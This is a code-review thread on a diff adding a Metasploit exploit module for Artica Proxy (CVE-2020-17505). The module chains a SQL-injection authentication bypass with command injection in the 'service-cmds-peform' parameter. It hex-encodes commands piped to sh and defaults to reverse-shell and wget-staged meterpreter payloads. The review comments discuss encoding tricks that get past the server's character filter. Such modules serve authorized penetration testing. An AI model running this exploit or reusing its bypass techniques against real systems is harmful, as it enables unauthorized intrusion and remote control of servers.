modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb

```diff
@@ -0,0 +1,153 @@
+            ['PACKETSTORM', '158868'],
+            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/'],
+          ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'RPort' => 9000
+          },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_perl'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ],
+          [
+            'Authentication bypass',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+            'Type' => :auth_bypass,
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => 'Aug 9 2020',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
+        OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
+      ]
+    )
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def check
+    @phpsessid = datastore['PHPSESSID'] || auth_bypass
+    unless @phpsessid
+      return CheckCode::Safe("Authentication failed")
+    end
+    rand_string = Rex::Text.rand_text_alphanumeric(4..16)
+    if execute_command("echo #{rand_string}").include?(rand_string)
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # particularity: cmd can't contain spaces, or some characters from a blacklist (+ included for example)
+    print_status 'Attempting to gain RCE via CVE-2020-17505'
+    # this should bypass the filtering
+    cmd = "echo #{Rex::Text.to_hex(cmd, '')}|xxd -r -p|sh".gsub(/ /, '${IFS}')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
+      'vars_get' => {
+        'service-cmds-peform' => "||#{cmd}||"
+      },
+      'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
+    })
+    res ? res.body : ''
+  end
+
+  def auth_bypass
+    apikey = "' UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"
```

Comment:
As the data is plain text, it is best to perform the encoding at run time. This allows the code to be more readable and easily editable than an opaque encoded blob.

```suggestion
    serialized_data = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
    apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_data)}';"
```

Reply:
```ruby
cmd = "ZWNobyAxIDE+bAo="
Rex::Text::uri_encode(cmd, 'hex-all')
=> "%5a%57%4e%6f%62%79%41%78%49%44%45%2b%62%41%6f%3d"
```

as I see, the `+` is encoded as `%2b`, which is the url-safe character for representing `+`, but the application will retrieve the `+` character, it also does not work when encoded this way, from my tests.

![img](https://i.imgur.com/ECtiV5r.png)

The `+` is being replaced with a space, I really don't see how url-encoding could bypass the character filtering done after the URL is decoded, the example you provided wouldn't work, if you have another PoC that works with `+` characters, please share it.

Reply:
> the example you provided wouldn't work

have you tried it? ;)

Reply:
> have you tried it? ;)

Wow, really didn't think it'd work xD, sorry for taking conclusions without testing the actual code, I fail to understand how the example in the picture does not work, but the fully hex-encoded payload does.

Updated, ${IFS} should be no longer needed.

Reply:
Your browser was lying to you.